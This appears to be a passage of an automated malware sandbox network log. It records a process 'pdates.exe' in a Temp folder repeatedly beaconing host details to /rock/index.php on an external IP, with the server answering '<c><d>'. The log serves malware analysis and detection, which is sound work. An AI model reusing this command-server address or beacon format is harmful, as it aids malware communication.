Jul 27, 2023 01:34:01.422136068 CEST	3767	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:01.470912933 CEST	3768	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:01 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
212	192.168.2.5	49932	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:01.635576010 CEST	3768	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:01.684765100 CEST	3768	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:01 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
213	192.168.2.5	49933	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:01.872410059 CEST	3769	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:01.921200037 CEST	3769	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:01 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
214	192.168.2.5	49934	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:02.086651087 CEST	3770	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:02.134576082 CEST	3770	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
215	192.168.2.5	49935	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:02.294759035 CEST	3771	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:02.343864918 CEST	3771	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
216	192.168.2.5	49936	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:02.507611036 CEST	3772	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:02.556628942 CEST	3772	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
217	192.168.2.5	49937	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:02.714544058 CEST	3773	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:02.765249014 CEST	3773	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
218	192.168.2.5	49938	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:02.921828032 CEST	3774	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:02.970172882 CEST	3774	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
219	192.168.2.5	49939	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:03.129499912 CEST	3775	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:03.178121090 CEST	3775	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:03 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.5	49738	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:07.831768990 CEST	2855	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:07.880043983 CEST	2855	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:07 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
220	192.168.2.5	49940	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:03.349404097 CEST	3776	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:03.398258924 CEST	3776	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:03 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
221	192.168.2.5	49941	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:03.557869911 CEST	3777	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:03.605420113 CEST	3778	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:03 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
222	192.168.2.5	49942	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:03.771533012 CEST	3778	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:03.819031954 CEST	3779	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:03 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
223	192.168.2.5	49943	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:03.980396986 CEST	3780	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:04.028422117 CEST	3780	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:03 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
224	192.168.2.5	49944	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:04.205950975 CEST	3781	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:04.253489971 CEST	3781	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:04 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
225	192.168.2.5	49945	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:04.403033018 CEST	3782	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:04.453085899 CEST	3782	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:04 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
226	192.168.2.5	49946	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:04.634984970 CEST	3783	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:04.683108091 CEST	3783	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:04 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
227	192.168.2.5	49947	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:04.842212915 CEST	3784	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:04.890013933 CEST	3784	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:04 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
228	192.168.2.5	49948	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:05.060920954 CEST	3784	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:05.108623981 CEST	3785	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:05 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
229	192.168.2.5	49949	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:05.275913954 CEST	3785	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:05.324549913 CEST	3786	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:05 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.5	49739	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:08.050254107 CEST	2856	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:08.098673105 CEST	2856	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:08 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
230	192.168.2.5	49950	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:05.488609076 CEST	3786	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:05.536367893 CEST	3787	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:05 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
231	192.168.2.5	49951	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:05.687211990 CEST	3787	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:05.735012054 CEST	3788	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:05 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
232	192.168.2.5	49952	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
